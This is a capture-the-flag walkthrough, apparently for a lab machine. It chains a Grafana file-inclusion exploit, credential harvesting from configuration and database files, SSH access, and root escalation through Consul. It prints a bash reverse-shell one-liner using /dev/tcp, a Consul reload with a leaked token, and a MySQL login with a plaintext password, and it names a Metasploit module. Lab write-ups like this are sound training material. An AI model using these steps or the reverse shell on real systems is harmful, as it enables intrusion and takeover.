Doing the initial nmap scan, we see 4 ports open
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRkl
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Mon, 03 Oct 2022 04:37:31 GMT
| Content-Length: 29
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 12
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, SupportsCompression, SwitchToSSLAfterHandshake, FoundRows, ODBCClien
t, ConnectWithDatabase, Speaks41ProtocolNew, LongColumnFlag, DontAllowDatabaseTableColumn, LongPassword, SupportsLoadDataLocal, InteractiveClient, IgnoreSpaceBeforeP
arenthesis, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x1D?!9'Z3\x01cc5\x1E:`9mj\x0D99
|_ Auth Plugin Name: caching_sha2_password
Looking at port 3000, we see it’s runnning
Grafana At the bottom we can see it’s version at
Looking for exploits for this version, we see an Local File Inclusion vulnerability exists for versions from
Grafana 8.3.1, 8.2.7, 8.1.8, and 8.0.7 released with high severity security fix
Note: We released fixes for CVE-2021-41090 and CVE-2021-43798 within 24 hours and mixed them up in one of the three…
I also found a python script to exploit this
exploit-grafana-CVE-2021-43798/exploit.py at main · pedrohavay/exploit-grafana-CVE-2021-43798
You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
But unfortunately this didn’t work for me, so I had to look in to the source code and figure out how to exploit this manually.
Seems like it’s getting an vulnerable endpoint and sending a typical LFI payload. Following the exploit, I was able to get the contents of the
/etc/passwd file with this payload.
Here, I found out that there is a user called
Since I there is
Grafana running, with this LFI, I looked into it’s configuration file at
From there, I found that there was a sqlite3 database to look for. It was at
So I downloaded it and opened it with
From there I found the password to login to the mysql server as
mysql -u grafana -p -h 10.10.11.183 -p'dontStandSoCloseToMe63221!'
Looking through the databases, I saw there was a database called
whackywidget quering this database, I was able to a base64 encoded password for the
By decoding this, I was able to login with ssh as
Looking through the file system, I saw there was a git repo in
/opt/my-app Looking for previous commits in the repo with
git show , I was able to get a token for
Looking at the open ports, I saw port
8500 was open, which is the default port for
consul was running as root
From this point onwards, there are 2 ways to go.
Method I — Manual exploitation with health check scripts
So I started enumerating the service more. Then I was able to figure out that the config directory for
consul was writable by the
I did a little googling and found out that I can add health check scripts for
consul which will be triggered upon restart. So I made a health check script which would execute a bash script that includes a reverse shell.
I moved this file to the config directory of
cp /tmp/check.json /etc/consul.d/config.d/
And for the reverse shell(
/tmp/shell.sh), I used the typical bash reverse shell.
bash -c 'bash -i >& /dev/tcp/10.10.11.12.9090/ 0>&1'
Once everything was in place, I restarted the
consul reload --token bb03b43b-1d81-d62b-24b5-39540ee469b5
Then I got a shell on my listener.
Method II — Exploiting with Metasploit by registering a service
After while I was doing the box, I came across an exploit module from metasploit which could exploit the
consul service by registering a new service.
Hashicorp Consul Remote Command Execution via Services API
Rapid7's VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.
For that you have to use the
exploit/multi/misc/consul_service_exec module. You have to set the options as follows and simply run the module.
Once you run it, you should be able to get a full meterpreter session which then can be used to get a shell as root.
Contact me though social media:
Email — email@example.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄